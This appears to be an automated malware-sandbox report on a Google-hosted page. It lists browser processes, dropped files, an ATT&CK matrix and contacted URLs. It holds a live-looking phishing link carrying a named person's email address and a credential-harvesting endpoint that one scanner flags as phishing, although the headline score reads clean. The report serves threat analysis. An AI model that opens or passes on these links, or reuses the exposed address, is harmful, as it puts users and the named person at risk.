    Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe 'C:\Program Files\Google\Chrome\Application\chrome.exe' --start-maximized --enable-automation 'https://00f74ba44bb50aa58a9dfd79647238a8f996daa403-apidata.googleusercontent.com/download/storage/v1/b/logon_id63757945b-32c6-49b0-83e6-1d93765276e7/o/index.html?jk=AFshE3VcvfzNdf-7zMKWd94-4dMrNIkOLLE47CQ43PY7P2MYpfKpiTisbCiM8ITDVUzsV5uBnwUTgNfImCvdn95XFg7yLPb4pK7mGtnykL6H73onzrS0TNqkpgxfmCGl9SjrMUh2HXQovXq0n_fa5hqbVlcfrBGOpBCkBBOuoY-yrNdFJA6qsh5mXJeZJEWhpyesRFni67jgONcRuOW0IhE2TSFjfiZ1kcHtUg4IakFROfuF2ixmgmZ0cygvwFJgzltWAi4BZy9gK7vN7kuIcB7IqaENeixO24771GkuNYSmkiDTJACa0r0VCNPcQlcK5lGRRAu7CmqBicTQElQR1sT8UAlS8qEccylxwvHxtG1ZQipoKLv7jRTmXa5gKf9qryarS-JmN2Dw-wvzqjvQU3ACMffC05IslAl45AuBr7XJD_AvOH4XV0oB1K69D_BJqrPx5F866tHjL87vL2OzmhOn2ZN6fGK9EaMH6l71egHyEMNh69wwpAccwpkljLmJNVIqygOVxaM5girr-FZHO5mJNqOa9bTFJMZFMQk75Bh1YPELgAun31aycC9L1gEIgi9xS2AI2BDHPNQB6OaElZLJZDJIsOs0jHoqoRQa-BsTDGYlSbZcoI1h5QuM3VxHMbmAZYEyCbHgEmb6QFG4Do70MelMz0hmqK1LB3zOLUGQVyL1NduEuvkLQPWtxDQ3Zeb-GyuldZGFe6ZOCmXUvu2OKrXBBFC3a0i4Io1wftvhtL1urvwaLVPFECoQBACGCtpQtZ45u5bBlHyHOYGrix_HPHteuU8UlCF1QPHHFIVg5XjWbBd9deixk_udmpRBTRN6b7-93o-J_Lga6iMebvzrAh6z2qFEd8YAqgMmCaIpY3uuMGkMbvjX_71pF2dS6_eUeo82_XpG60fSB3QZnvV0oMGUvZu6gOHeues8gSXLQCwqfhwa_7AgDj94Gv_4jjp6oSobCikZNfcIVBrhso8uTX4sUJ5X9GsLxXBisRNqpQ&isca=1#david.acquaviva@searshc.com'
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe 'C:\Program Files\Google\Chrome\Application\chrome.exe' --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1560,11279809522291121238,16691019274040458448,131072 --lang=en-US --service-sandbox-type=network --enable-audio-service-sandbox --mojo-platform-channel-handle=1920 /prefetch:8
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe 'C:\Program Files\Google\Chrome\Application\chrome.exe' --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1560,11279809522291121238,16691019274040458448,131072 --lang=en-US --service-sandbox-type=network --enable-audio-service-sandbox --mojo-platform-channel-handle=1920 /prefetch:8Jump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: https://00f74ba44bb50aa58a9dfd79647238a8f996daa403-apidata.googleusercontent.com/download/storage/v1/b/logon_id63757945b-32c6-49b0-83e6-1d93765276e7/o/index.html?jk=AFshE3VcvfzNdf-7zMKWd94-4dMrNIkOLLE47CQ43PY7P2MYpfKpiTisbCiM8ITDVUzsV5uBnwUTgNfImCvdn95XFg7yLPb4pK7mGtnykL6H73onzrS0TNqkpgxfmCGl9SjrMUh2HXQovXq0n_fa5hqbVlcfrBGOpBCkBBOuoY-yrNdFJA6qsh5mXJeZJEWhpyesRFni67jgONcRuOW0IhE2TSFjfiZ1kcHtUg4IakFROfuF2ixmgmZ0cygvwFJgzltWAi4BZy9gK7vN7kuIcB7IqaENeixO24771GkuNYSmkiDTJACa0r0VCNPcQlcK5lGRRAu7CmqBicTQElQR1sT8UAlS8qEccylxwvHxtG1ZQipoKLv7jRTmXa5gKf9qryarS-JmN2Dw-wvzqjvQU3ACMffC05IslAl45AuBr7XJD_AvOH4XV0oB1K69D_BJqrPx5F866tHjL87vL2OzmhOn2ZN6fGK9EaMH6l71egHyEMNh69wwpAccwpkljLmJNVIqygOVxaM5girr-FZHO5mJNqOa9bTFJMZFMQk75Bh1YPELgAun31aycC9L1gEIgi9xS2AI2BDHPNQB6OaElZLJZDJIsOs0jHoqoRQa-BsTDGYlSbZcoI1h5QuM3VxHMbmAZYEyCbHgEmb6QFG4Do70MelMz0hmqK1LB3zOLUGQVyL1NduEuvkLQPWtxDQ3Zeb-GyuldZGFe6ZOCmXUvu2OKrXBBFC3a0i4Io1wftvhtL1urvwaLVPFECoQBACGCtpQtZ45u5bBlHyHOYGrix_HPHteuU8UlCF1QPHHFIVg5XjWbBd9deixk_udmpRBTRN6b7-93o-J_Lga6iMebvzrAh6z2qFEd8YAqgMmCaIpY3uuMGkMbvjX_71pF2dS6_eUeo82_XpG60fSB3QZnvV0oMGUvZu6gOHeues8gSXLQCwqfhwa_7AgDj94Gv_4jjp6oSobCikZNfcIVBrhso8uTX4sUJ5X9GsLxXBisRNqpQ&isca=1#david.acquaviva@searshc.comJoe Sandbox Cloud Basic: Detection: clean Score: 0Perma Link
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Program Files\Google\Chrome\Application\DictionariesJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\BrowserMetrics\BrowserMetrics-6177571E-16A8.pmaJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeDirectory created: C:\Program Files\Google\Chrome\Application\DictionariesJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeDirectory created: C:\Program Files\Google\Chrome\Application\Dictionaries\en-US-9-0.bdicJump to behavior

    Mitre Att&ck Matrix

    Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
    Valid AccountsWindows Management InstrumentationPath InterceptionProcess Injection1Masquerading3OS Credential DumpingSystem Service DiscoveryRemote ServicesData from Local SystemExfiltration Over Other Network MediumEncrypted Channel1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
    Default AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsProcess Injection1LSASS MemoryApplication Window DiscoveryRemote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothNon-Application Layer Protocol3Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
    Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Obfuscated Files or InformationSecurity Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationApplication Layer Protocol4Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
    Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Binary PaddingNTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput CaptureScheduled TransferIngress Tool Transfer1SIM Card SwapCarrier Billing Fraud

    Behavior Graph

    Hide Legend

    Legend:

    • Process
    • Signature
    • Created File
    • DNS/IP Info
    • Is Dropped
    • Is Windows Process
    • Number of created Registry Values
    • Number of created Files
    • Visual Basic
    • Delphi
    • Java
    • .Net C# or VB.NET
    • C, C++ or other language
    • Is malicious
    • Internet

    Screenshots

    Thumbnails

    This section contains all screenshots as thumbnails, including those not shown in the slideshow.

    windows-stand

    Antivirus, Machine Learning and Genetic Malware Detection

    Initial Sample

    SourceDetectionScannerLabelLink
    https://00f74ba44bb50aa58a9dfd79647238a8f996daa403-apidata.googleusercontent.com/download/storage/v1/b/logon_id63757945b-32c6-49b0-83e6-1d93765276e7/o/index.html?jk=AFshE3VcvfzNdf-7zMKWd94-4dMrNIkOLLE47CQ43PY7P2MYpfKpiTisbCiM8ITDVUzsV5uBnwUTgNfImCvdn95XFg7yLPb4pK7mGtnykL6H73onzrS0TNqkpgxfmCGl9SjrMUh2HXQovXq0n_fa5hqbVlcfrBGOpBCkBBOuoY-yrNdFJA6qsh5mXJeZJEWhpyesRFni67jgONcRuOW0IhE2TSFjfiZ1kcHtUg4IakFROfuF2ixmgmZ0cygvwFJgzltWAi4BZy9gK7vN7kuIcB7IqaENeixO24771GkuNYSmkiDTJACa0r0VCNPcQlcK5lGRRAu7CmqBicTQElQR1sT8UAlS8qEccylxwvHxtG1ZQipoKLv7jRTmXa5gKf9qryarS-JmN2Dw-wvzqjvQU3ACMffC05IslAl45AuBr7XJD_AvOH4XV0oB1K69D_BJqrPx5F866tHjL87vL2OzmhOn2ZN6fGK9EaMH6l71egHyEMNh69wwpAccwpkljLmJNVIqygOVxaM5girr-FZHO5mJNqOa9bTFJMZFMQk75Bh1YPELgAun31aycC9L1gEIgi9xS2AI2BDHPNQB6OaElZLJZDJIsOs0jHoqoRQa-BsTDGYlSbZcoI1h5QuM3VxHMbmAZYEyCbHgEmb6QFG4Do70MelMz0hmqK1LB3zOLUGQVyL1NduEuvkLQPWtxDQ3Zeb-GyuldZGFe6ZOCmXUvu2OKrXBBFC3a0i4Io1wftvhtL1urvwaLVPFECoQBACGCtpQtZ45u5bBlHyHOYGrix_HPHteuU8UlCF1QPHHFIVg5XjWbBd9deixk_udmpRBTRN6b7-93o-J_Lga6iMebvzrAh6z2qFEd8YAqgMmCaIpY3uuMGkMbvjX_71pF2dS6_eUeo82_XpG60fSB3QZnvV0oMGUvZu6gOHeues8gSXLQCwqfhwa_7AgDj94Gv_4jjp6oSobCikZNfcIVBrhso8uTX4sUJ5X9GsLxXBisRNqpQ&isca=1#david.acquaviva@searshc.com0%Avira URL Cloudsafe

    Dropped Files

    SourceDetectionScannerLabelLink
    C:\Users\user\AppData\Local\Temp\5800_1946143775\_platform_specific\x86_64\pnacl_public_x86_64_ld_nexe0%MetadefenderBrowse
    C:\Users\user\AppData\Local\Temp\5800_1946143775\_platform_specific\x86_64\pnacl_public_x86_64_ld_nexe0%ReversingLabs
    C:\Users\user\AppData\Local\Temp\5800_1946143775\_platform_specific\x86_64\pnacl_public_x86_64_pnacl_llc_nexe0%MetadefenderBrowse
    C:\Users\user\AppData\Local\Temp\5800_1946143775\_platform_specific\x86_64\pnacl_public_x86_64_pnacl_llc_nexe0%ReversingLabs
    C:\Users\user\AppData\Local\Temp\5800_1946143775\_platform_specific\x86_64\pnacl_public_x86_64_pnacl_sz_nexe0%MetadefenderBrowse
    C:\Users\user\AppData\Local\Temp\5800_1946143775\_platform_specific\x86_64\pnacl_public_x86_64_pnacl_sz_nexe0%ReversingLabs

    Unpacked PE Files

    No Antivirus matches

    Domains

    No Antivirus matches

    URLs

    SourceDetectionScannerLabelLink
    http://crl.pki.goog/gsr1/gsr1.crl0;0%URL Reputationsafe
    http://crls.pki.goog/gts1c3/fVJxbV-Ktmk.crl00%URL Reputationsafe
    http://pki.goog/repo/certs/gtsr1.der040%URL Reputationsafe
    https://csp.withgoogle.com/csp/report-to/hosted-libraries-pushers0%URL Reputationsafe
    https://dns.google0%URL Reputationsafe
    https://www.google.com;0%Avira URL Cloudsafe
    http://crl.pki.goog/gtsr1/gtsr1.crl0W0%URL Reputationsafe
    http://pki.goog/gsr1/gsr1.crt020%URL Reputationsafe
    https://pki.goog/repository/00%URL Reputationsafe
    https://csp.withgoogle.com/csp/hosted-libraries-pushers0%URL Reputationsafe
    https://laskyduniganprivatlab.com/common/logon/next.php4%VirustotalBrowse
    https://laskyduniganprivatlab.com/common/logon/next.php100%Avira URL Cloudphishing
    https://csp.withgoogle.com/csp/hosted-libraries-pushersCross-Origin-Resource-Policy:0%URL Reputationsafe
    https://csp.withgoogle.com/csp/report-to/encsid_AZM8iraMxxUfRnRum-EGst9UuHcPNVSf9Kp1_90wIgU0%URL Reputationsafe
    http://pki.goog/repo/certs/gts1c3.der00%URL Reputationsafe

    Domains and IPs

    Contacted Domains

    NameIPActiveMaliciousAntivirus DetectionReputation
    stackpath.bootstrapcdn.com
    104.18.10.207
    truefalse
      high
      gstaticadssl.l.google.com
      216.58.215.227
      truefalse
        high
        accounts.google.com
        142.250.203.109
        truefalse
          high
          cdnjs.cloudflare.com
          104.16.19.94
          truefalse
            high
            maxcdn.bootstrapcdn.com
            104.18.10.207
            truefalse
              high
              clients.l.google.com
              142.250.181.238
              truefalse
                high
                googlehosted.l.googleusercontent.com
                172.217.168.33
                truefalse
                  high
                  clients2.googleusercontent.com
                  unknown
                  unknownfalse
                    high
                    clients2.google.com
                    unknown
                    unknownfalse
                      high
                      ka-f.fontawesome.com
                      unknown
                      unknownfalse
                        high
                        code.jquery.com
                        unknown
                        unknownfalse
                          high
                          00f74ba44bb50aa58a9dfd79647238a8f996daa403-apidata.googleusercontent.com
                          unknown
                          unknownfalse
                            high
                            kit.fontawesome.com
                            unknown
                            unknownfalse
                              high

                              Contacted URLs

                              NameMaliciousAntivirus DetectionReputation
                              https://maxcdn.bootstrapcdn.com/bootstrap/4.0.0/js/bootstrap.min.jsfalse
                                high
                                https://clients2.google.com/service/update2/crx?os=win&arch=x64&os_arch=x86_64&nacl_arch=x86-64&prod=chromecrx&prodchannel=&prodversion=85.0.4183.121&lang=en-US&acceptformat=crx3&x=id%3Dnmmhkkegccagdldgiimedpiccmgmieda%26v%3D0.0.0.0%26installedby%3Dother%26uc%26ping%3Dr%253D-1%2526e%253D1&x=id%3Dpkedcjkdefgpdelpbcmbmeomcjbeemfm%26v%3D0.0.0.0%26installedby%3Dother%26uc%26ping%3Dr%253D-1%2526e%253D1false
                                  high
                                  https://accounts.google.com/ListAccounts?gpsia=1&source=ChromiumBrowser&json=standardfalse
                                    high
                                    https://stackpath.bootstrapcdn.com/bootstrap/4.1.3/js/bootstrap.min.jsfalse
                                      high
                                      https://maxcdn.bootstrapcdn.com/bootstrap/4.0.0/css/bootstrap.min.cssfalse
                                        high
                                        https://cdnjs.cloudflare.com/ajax/libs/popper.js/1.12.9/umd/popper.min.jsfalse
                                          high

                                          URLs from Memory and Binaries

                                          NameSourceMaliciousAntivirus DetectionReputation
                                          http://crl.pki.goog/gsr1/gsr1.crl0;data_3.2.drfalse
                                          • URL Reputation: safe
                                          unknown
                                          https://cdnjs.cloudflare.com/ajax/libs/popper.js/1.12.9/umd/popper.min.jskfdata_1.2.drfalse
                                            high
                                            https://apis.google.com/js/client.jsmirroring_common.js.0.drfalse
                                              high
                                              https://00f74ba44bb50aa58a9dfd79647238a8f996daa403-apidata.googleusercontent.com/favicon.icoChIKBw2Ddata_1.2.drfalse
                                                high
                                                https://ka-f.fontawesome.comdata_3.2.drfalse
                                                  high
                                                  https://www.google.com/images/cleardot.gifcraw_window.js.0.drfalse
                                                    high
                                                    https://code.jquery.com/jquery-3.2.1.slim.min.jsdata_3.2.dr, data_1.2.drfalse
                                                      high
                                                      https://play.google.com87f7696b-5039-4fdb-a102-3f34d3c97e7f.tmp.2.dr, e7317a57-3d14-4fd9-8697-bfbd8158919d.tmp.2.drfalse
                                                        high
                                                        https://crash.corp.google.com/samples?reportid=&q=mirroring_cast_streaming.js.0.dr, common.js.0.drfalse
                                                          high
                                                          https://www.google.com/log?format=json&hasfast=truemirroring_hangouts.js.0.drfalse
                                                            high
                                                            https://ka-f.fontawesome.com/releases/v5.15.4/css/free-v4-shims.min.css?token=585b051251data_1.2.drfalse
                                                              high
                                                              https://easylist.to/)LICENSE.txt.0.drfalse
                                                                high
                                                                https://sandbox.google.com/payments/v4/js/integrator.jscraw_window.js.0.dr, manifest.json.0.drfalse
                                                                  high
                                                                  http://www.ietf.org/id/draft-holmer-rmcat-transport-wide-cc-extensions-01mirroring_hangouts.js.0.drfalse
                                                                    high
                                                                    https://accounts.google.com/MergeSessioncraw_window.js.0.drfalse
                                                                      high
                                                                      https://creativecommons.org/compatiblelicensesLICENSE.txt.0.drfalse
                                                                        high
                                                                        https://preprod-hangouts-googleapis.sandbox.google.commirroring_hangouts.js.0.drfalse
                                                                          high
                                                                          http://crls.pki.goog/gts1c3/fVJxbV-Ktmk.crl0data_3.2.drfalse
                                                                          • URL Reputation: safe
                                                                          unknown
                                                                          http://pki.goog/repo/certs/gtsr1.der04data_3.2.drfalse
                                                                          • URL Reputation: safe
                                                                          unknown
                                                                          https://www.google.com87f7696b-5039-4fdb-a102-3f34d3c97e7f.tmp.2.dr, e7317a57-3d14-4fd9-8697-bfbd8158919d.tmp.2.dr, manifest.json0.0.drfalse
                                                                            high
                                                                            https://github.com/easylist)LICENSE.txt.0.drfalse
                                                                              high
                                                                              https://creativecommons.org/.LICENSE.txt.0.drfalse
                                                                                high
                                                                                https://hangouts.clients6.google.commirroring_hangouts.js.0.drfalse
                                                                                  high
                                                                                  https://meet.google.commirroring_common.js.0.drfalse
                                                                                    high
                                                                                    https://hangouts.google.com/hangouts/_/logprefmirroring_hangouts.js.0.drfalse
                                                                                      high
                                                                                      https://accounts.google.com87f7696b-5039-4fdb-a102-3f34d3c97e7f.tmp.2.dr, e7317a57-3d14-4fd9-8697-bfbd8158919d.tmp.2.dr, manifest.json0.0.drfalse
                                                                                        high
                                                                                        https://clients2.google.com/cr/reportmirroring_hangouts.js.0.dr, mirroring_cast_streaming.js.0.drfalse
                                                                                          high
                                                                                          http://angularjs.organgular.js.0.drfalse
                                                                                            high
                                                                                            https://creativecommons.org/publicdomain/zero/1.0/.mirroring_hangouts.js.0.drfalse
                                                                                              high
                                                                                              https://github.com/angular/materialmaterial_css_min.css.0.drfalse
                                                                                                high
                                                                                                https://apis.google.com87f7696b-5039-4fdb-a102-3f34d3c97e7f.tmp.2.dr, e7317a57-3d14-4fd9-8697-bfbd8158919d.tmp.2.dr, manifest.json0.0.drfalse
                                                                                                  high
                                                                                                  https://kit.fontawesome.com/585b051251.jsdata_1.2.drfalse
                                                                                                    high
                                                                                                    https://www.google.com/accounts/OAuthLogin?issueuberauth=1craw_window.js.0.drfalse
                                                                                                      high
                                                                                                      https://github.com/madler/zlib/blob/master/zlib.hmirroring_hangouts.js.0.drfalse
                                                                                                        high
                                                                                                        https://www-googleapis-staging.sandbox.google.comcraw_window.js.0.dr, craw_background.js.0.drfalse
                                                                                                          high
                                                                                                          https://a.nel.cloudflare.com/report/v3?s=E7BwEBO%2FNJbH8jI5GxGK1G4KpkHazo5UjO2gc%2FDQ9HL7lJ2GvAjzObcReporting and NEL.2.drfalse
                                                                                                            high
                                                                                                            https://csp.withgoogle.com/csp/report-to/hosted-libraries-pushersdata_3.2.dr, Reporting and NEL.2.drfalse
                                                                                                            • URL Reputation: safe
                                                                                                            unknown
                                                                                                            https://clients2.google.com87f7696b-5039-4fdb-a102-3f34d3c97e7f.tmp.2.dr, e7317a57-3d14-4fd9-8697-bfbd8158919d.tmp.2.drfalse
                                                                                                              high
                                                                                                              https://00f74ba44bb50aa58a9dfd79647238a8f996daa403-apidata.googleusercontent.com/favicon.icodata_1.2.drfalse
                                                                                                                high
                                                                                                                https://00f74ba44bb50aa58a9dfd79647238a8f996daa403-apidata.googleusercontent.com87f7696b-5039-4fdb-a102-3f34d3c97e7f.tmp.2.drfalse
                                                                                                                  high
                                                                                                                  https://www.google.com/tools/feedbackfeedback_script.js.0.drfalse
                                                                                                                    high
                                                                                                                    http://www.apache.org/licenses/LICENSE-2.0mirroring_hangouts.js.0.drfalse
                                                                                                                      high
                                                                                                                      https://dns.google87f7696b-5039-4fdb-a102-3f34d3c97e7f.tmp.2.dr, fb916b91-1de5-4a97-a1b9-d05f0ecb0538.tmp.2.dr, e7317a57-3d14-4fd9-8697-bfbd8158919d.tmp.2.dr, 90ffbf66-70a1-431f-ab38-4e0141a0e529.tmp.2.drfalse
                                                                                                                      • URL Reputation: safe
                                                                                                                      unknown
                                                                                                                      https://github.com/google/closure-library/wiki/goog.module:-an-ES6-module-like-alternative-to-goog.pcraw_window.js.0.dr, craw_background.js.0.drfalse
                                                                                                                        high
                                                                                                                        https://www.google.com/intl/en-US/chrome/blank.htmlcraw_background.js.0.drfalse
                                                                                                                          high
                                                                                                                          https://ogs.google.com87f7696b-5039-4fdb-a102-3f34d3c97e7f.tmp.2.dr, e7317a57-3d14-4fd9-8697-bfbd8158919d.tmp.2.drfalse
                                                                                                                            high
                                                                                                                            https://support.google.com/chromecast/troubleshooter/2995236messages.json41.0.dr, feedback.html.0.drfalse
                                                                                                                              high
                                                                                                                              https://00f74ba44bb50aa58a9dfd79647238a8f996daa403-apidata.googleusercontent.com/download/storage/v1History.0.drfalse
                                                                                                                                high
                                                                                                                                http://www.ietf.org/id/draft-holmer-rmcat-transport-wide-cc-extensionsmirroring_hangouts.js.0.drfalse
                                                                                                                                  high
                                                                                                                                  https://payments.google.com/payments/v4/js/integrator.jscraw_window.js.0.dr, manifest.json.0.drfalse
                                                                                                                                    high
                                                                                                                                    https://www.google.com;manifest.json0.0.drfalse
                                                                                                                                    • Avira URL Cloud: safe
                                                                                                                                    low
                                                                                                                                    https://chromium.googlesource.com/a/native_client/pnacl-llvm.gitpnacl_public_x86_64_libcrt_platform_a.0.drfalse
                                                                                                                                      high
                                                                                                                                      https://hangouts.google.com/manifest.json0.0.drfalse
                                                                                                                                        high
                                                                                                                                        http://crl.pki.goog/gtsr1/gtsr1.crl0Wdata_3.2.drfalse
                                                                                                                                        • URL Reputation: safe
                                                                                                                                        unknown
                                                                                                                                        http://pki.goog/gsr1/gsr1.crt02data_3.2.drfalse
                                                                                                                                        • URL Reputation: safe
                                                                                                                                        unknown
                                                                                                                                        https://ka-f.fontawesome.com/releases/v5.15.4/css/free.min.css?token=585b051251data_1.2.drfalse
                                                                                                                                          high
                                                                                                                                          https://pki.goog/repository/0data_3.2.drfalse
                                                                                                                                          • URL Reputation: safe
                                                                                                                                          unknown
                                                                                                                                          https://csp.withgoogle.com/csp/hosted-libraries-pushersdata_3.2.drfalse
                                                                                                                                          • URL Reputation: safe
                                                                                                                                          unknown
                                                                                                                                          https://www.google.com/images/x2.gifcraw_window.js.0.drfalse
                                                                                                                                            high
                                                                                                                                            http://llvm.org/):pnacl_public_x86_64_pnacl_sz_nexe.0.drfalse
                                                                                                                                              high
                                                                                                                                              https://maxcdn.bootstrapcdn.com/bootstrap/4.0.0/js/bootstrap.min.jsMdata_1.2.drfalse
                                                                                                                                                high
                                                                                                                                                https://www.google.com/images/dot2.gifcraw_window.js.0.drfalse
                                                                                                                                                  high
                                                                                                                                                  https://kit.fontawesome.comdata_3.2.drfalse
                                                                                                                                                    high
                                                                                                                                                    https://meetings.clients6.google.commirroring_hangouts.js.0.drfalse
                                                                                                                                                      high
                                                                                                                                                      https://play.google.com/log?format=json&hasfast=truemirroring_hangouts.js.0.drfalse
                                                                                                                                                        high
                                                                                                                                                        https://code.google.com/p/nativeclient/issues/entry%s:pnacl_public_x86_64_ld_nexe.0.drfalse
                                                                                                                                                          high
                                                                                                                                                          http://tools.ietf.org/html/rfc1950mirroring_hangouts.js.0.drfalse
                                                                                                                                                            high
                                                                                                                                                            https://laskyduniganprivatlab.com/common/logon/next.phpdata_3.2.drtrue
                                                                                                                                                            • 4%, Virustotal, Browse
                                                                                                                                                            • Avira URL Cloud: phishing
                                                                                                                                                            unknown
                                                                                                                                                            https://code.google.com/p/nativeclient/issues/entrypnacl_public_x86_64_ld_nexe.0.drfalse
                                                                                                                                                              high
                                                                                                                                                              https://csp.withgoogle.com/csp/hosted-libraries-pushersCross-Origin-Resource-Policy:data_3.2.drfalse
                                                                                                                                                              • URL Reputation: safe
                                                                                                                                                              unknown
                                                                                                                                                              https://support.google.com/chromecast/answer/2998456messages.json41.0.dr, feedback.html.0.drfalse
                                                                                                                                                                high
                                                                                                                                                                https://csp.withgoogle.com/csp/report-to/encsid_AZM8iraMxxUfRnRum-EGst9UuHcPNVSf9Kp1_90wIgUdata_3.2.dr, Reporting and NEL.2.drfalse
                                                                                                                                                                • URL Reputation: safe
                                                                                                                                                                unknown
                                                                                                                                                                https://clients2.googleusercontent.com87f7696b-5039-4fdb-a102-3f34d3c97e7f.tmp.2.dr, e7317a57-3d14-4fd9-8697-bfbd8158919d.tmp.2.drfalse
                                                                                                                                                                  high
                                                                                                                                                                  https://docs.google.commirroring_common.js.0.drfalse
                                                                                                                                                                    high
                                                                                                                                                                    https://a.nel.cloudflare.com/report/v3?s=SiYnHebMjN373%2B5EkY%2FlpsMd8SEgwXmx394Z0tAo9xol7i6PO7z0fuxReporting and NEL.2.drfalse
                                                                                                                                                                      high
                                                                                                                                                                      https://www.google.com/manifest.json.0.drfalse
                                                                                                                                                                        high
                                                                                                                                                                        https://feedback.googleusercontent.commanifest.json0.0.drfalse
                                                                                                                                                                          high
                                                                                                                                                                          https://chromium.googlesource.com/a/native_client/pnacl-clang.gitpnacl_public_x86_64_libcrt_platform_a.0.drfalse
                                                                                                                                                                            high
                                                                                                                                                                            https://clients2.google.com/service/update2/crxmanifest.json1.0.dr, manifest.json0.0.drfalse
                                                                                                                                                                              high
                                                                                                                                                                              https://clients6.google.commirroring_hangouts.js.0.drfalse
                                                                                                                                                                                high
                                                                                                                                                                                http://pki.goog/repo/certs/gts1c3.der0data_3.2.drfalse
                                                                                                                                                                                • URL Reputation: safe
                                                                                                                                                                                unknown

                                                                                                                                                                                Contacted IPs

                                                                                                                                                                                • No. of IPs < 25%
                                                                                                                                                                                • 25% < No. of IPs < 50%
                                                                                                                                                                                • 50% < No. of IPs < 75%
                                                                                                                                                                                • 75% < No. of IPs

                                                                                                                                                                                Public

                                                                                                                                                                                IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                                                104.18.10.207
                                                                                                                                                                                stackpath.bootstrapcdn.comUnited States
                                                                                                                                                                                13335CLOUDFLARENETUSfalse
                                                                                                                                                                                216.58.215.227
                                                                                                                                                                                gstaticadssl.l.google.comUnited States
                                                                                                                                                                                15169GOOGLEUSfalse
                                                                                                                                                                                142.250.181.238
                                                                                                                                                                                clients.l.google.comUnited States
                                                                                                                                                                                15169GOOGLEUSfalse
                                                                                                                                                                                239.255.255.250
                                                                                                                                                                                unknownReserved
                                                                                                                                                                                unknownunknownfalse
                                                                                                                                                                                172.217.168.33
                                                                                                                                                                                googlehosted.l.googleusercontent.comUnited States
                                                                                                                                                                                15169GOOGLEUSfalse
                                                                                                                                                                                104.16.19.94
                                                                                                                                                                                cdnjs.cloudflare.comUnited States
                                                                                                                                                                                13335CLOUDFLARENETUSfalse
                                                                                                                                                                                142.250.203.109
                                                                                                                                                                                accounts.google.comUnited States
                                                                                                                                                                                15169GOOGLEUSfalse

                                                                                                                                                                                Private

                                                                                                                                                                                IP
                                                                                                                                                                                192.168.2.1
                                                                                                                                                                                127.0.0.1

                                                                                                                                                                                General Information

                                                                                                                                                                                Joe Sandbox Version:33.0.0 White Diamond
                                                                                                                                                                                Analysis ID:508883
                                                                                                                                                                                Start date:25.10.2021
                                                                                                                                                                                Start time:18:16:25
                                                                                                                                                                                Joe Sandbox Product:CloudBasic
                                                                                                                                                                                Overall analysis duration:0h 5m 20s
